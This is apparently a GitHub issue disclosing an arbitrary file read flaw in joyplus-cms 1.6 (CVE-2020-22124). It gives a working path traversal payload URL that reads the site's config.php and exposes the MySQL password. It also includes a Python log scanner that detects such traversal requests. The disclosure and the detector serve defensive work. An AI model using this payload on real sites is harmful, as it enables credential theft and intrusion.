joyplus-cms 1.6 has Any file to read vulnerability #1

Open
876054426 opened this issue Feb 25, 2020 · 2 comments

@876054426
Owner

Title: joyplus-cms 1.6 - Any file to read vulnerability

Date: 2020-02-25

Exploit Author: Zeo

Vendor Homepage: https://github.com/joyplus/joyplus-cms and http://www.joyplus.tv

Software Link: https://github.com/joyplus/joyplus-cms

Version: 1.6

Tested on Windows 7

joyplus-cms 1.6 has a vulnerability that allows any file to be read,

which would allow an attacker to obtain sensitive website information, such as the MySQL or FTP password.

Proof:

1. Install the site normally and log in:
http://127.0.0.1/joyplus-cms/manager/index.php?action=login

2. Access the page that triggers the vulnerability. You can switch to any directory.
Payload:
http://127.0.0.1/joyplus-cms/manager/admin_ads.php?action=edit&file=../../../inc/config.php

You can switch to any directory, e.g. file=../../../inc/config.php

Read

3. Read the "\joyplus-cms\inc\config.php" code, which lets the cat out of the bag: the MySQL password.
You can switch to any directory; just change the file=../../../xx.xx

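A detection sketch for the request pattern reported above, added here as an example and not part of the original issue or the joyplus-cms code base: it scans web access logs for `admin_ads.php` requests whose `file` parameter climbs out of its starting directory, including percent-encoded and backslash forms. The log lines, IP addresses and the `banner.html` name are constructed, and the combined log format is an assumption.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not from a real server); banner.html is a made-up name.
SAMPLE_LOG = [
    '198.51.100.4 - - [25/Feb/2020:10:00:01 +0000] "GET /joyplus-cms/manager/admin_ads.php?action=edit&file=banner.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [25/Feb/2020:10:00:05 +0000] "GET /joyplus-cms/manager/admin_ads.php?action=edit&file=../../../inc/config.php HTTP/1.1" 200 2048',
    '203.0.113.9 - - [25/Feb/2020:10:00:09 +0000] "GET /joyplus-cms/manager/admin_ads.php?action=edit&file=..%255c..%255c..%255cinc%255cconfig.php HTTP/1.1" 200 2048',
    '198.51.100.4 - - [25/Feb/2020:10:00:12 +0000] "GET /joyplus-cms/manager/admin_ads.php?action=edit&file=tpl/../banner.html HTTP/1.1" 200 512',
    '198.51.100.4 - - [25/Feb/2020:10:00:15 +0000] "GET /joyplus-cms/manager/index.php?action=login HTTP/1.1" 200 900',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded separators are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_directory(file_param):
    """True if the value is absolute or normalizes to a path above its start."""
    path = fully_decode(file_param).replace("\\", "/")  # Windows separators
    if path.startswith("/") or re.match(r"^[A-Za-z]:", path):
        return True
    normalized = posixpath.normpath(path)
    return normalized == ".." or normalized.startswith("../")


def find_traversal_requests(lines, script="admin_ads.php"):
    """Return (client_ip, decoded file value) for each suspicious request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/" + script):
            continue
        for value in parse_qs(url.query).get("file", []):
            if escapes_directory(value):
                hits.append((line.split()[0], fully_decode(value)))
    return hits
```

The same normalize-then-compare check, applied server-side before the file is opened, is the usual way to confine such a parameter to its intended directory.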

@fgeek

fgeek commented Aug 21, 2021

CVE-2020-22124 has been assigned for this issue.

@fgeek

fgeek commented Aug 21, 2021

Btw both vendor home pages are not available anymore.
